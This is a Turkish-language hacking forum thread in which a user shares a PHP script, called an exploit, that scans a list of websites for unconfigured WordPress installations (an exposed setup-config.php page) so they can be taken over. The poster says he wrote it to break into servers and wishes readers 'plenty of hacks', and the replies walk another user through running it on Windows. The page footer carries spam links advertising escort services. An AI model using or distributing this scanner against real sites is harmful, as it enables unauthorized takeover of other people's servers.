WPinstall Exploit [Wordpress Kurulmamış Siteleri Tarar]

N

Nihilist

Yeni Üye
Katılım
21 Şub 2016
Mesajlar
19
Tepkime puanı
0
Puanları
0
Uzun zaman önce sunuculara sızmak için kodladığım bir exploittir. Pek çok defa işime yaradı. Sizlerle de paylaşayım dedim. Bol hackler :)

Kullanim:
php wpinstall.php sitelistesi.txt

x829s2ye.png

4qw4tcik.png

r9278cuz.png


PHP: 
<?php
echo "\r\n";
echo '##	Coded By Nihilist';
echo "\r\n";
echo '##	Ajanlar.ORG';
echo "\r\n";
echo "\r\n";
set_time_limit(0);
error_reporting(0);

if (isset($argv[1]))
{
	$oku = file_get_contents($argv[1]);
	$ayir = split("\r\n",$oku);
	foreach($ayir as $siteler)
	{
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $siteler."/wp-admin/setup-config.php");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
		curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
		$icerik = curl_exec($ch);
		curl_close($ch);
		if (strstr($icerik,'setup-config.php?step=1'))
		{
			echo $siteler." --> Var :)\r\n";
		}
		else
		{
			
		}

	}

}
else{
	echo 'Ornek: php wpinstall.php sitelistesi.txt';
}





?>
 
BH80

BH80

Yeni Üye
Katılım
10 Ara 2015
Mesajlar
97
Tepkime puanı
0
Puanları
0
Bunu cmd ilemi çalıştırıyoruz yoksa sunucuyamı atıyoruz ?
 
N

Nihilist

Yeni Üye
Katılım
21 Şub 2016
Mesajlar
19
Tepkime puanı
0
Puanları
0
BH80' Alıntı:
Bunu cmd ilemi çalıştırıyoruz yoksa sunucuyamı atıyoruz ?
Genişletmek için tıkla ...

Bu bir php exploittir. Herhangi bir php derleyici ile kullanılabilir. Appserv adlı programı öneririm.

Appserv programını yükledikten sonra exploiti herhangi bir yere atacaksın.
Mesela c:\ içine at.



Sonra cmdye girip aşağıdaki komutu gireceksin:

cd c:\

ardından

php wpinstall.php sitelistesi.txt

komutunu gireceksin.


Tabi ki önce sitelistesi.txt içine taranacak tüm siteleri atacaksın.
 
BH80

BH80

Yeni Üye
Katılım
10 Ara 2015
Mesajlar
97
Tepkime puanı
0
Puanları
0
appserv kurdum exploitleride dediğin gibi C:/ attım ancak komutu verince böyle oluyor sıkıntı ne ?



Wkndpm.png
 
N

Nihilist

Yeni Üye
Katılım
21 Şub 2016
Mesajlar
19
Tepkime puanı
0
Puanları
0
BH80' Alıntı:
appserv kurdum exploitleride dediğin gibi C:/ attım ancak komutu verince böyle oluyor sıkıntı ne ?



Wkndpm.png
Genişletmek için tıkla ...


Php tanımlaması yapılmamış. Sen exploiti
C:\AppServ\php5 içerisinde çalıştır. Sorun hallolacaktır.
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort bodrum escort alanya escort kayseri escort konya escort marmaris escort bodrum escort tto dermodicos vozol puff sakarya escort sakarya escort bayan serdivan escort adapazarı escort
Üst
Copyright® Ajanlar.org 2012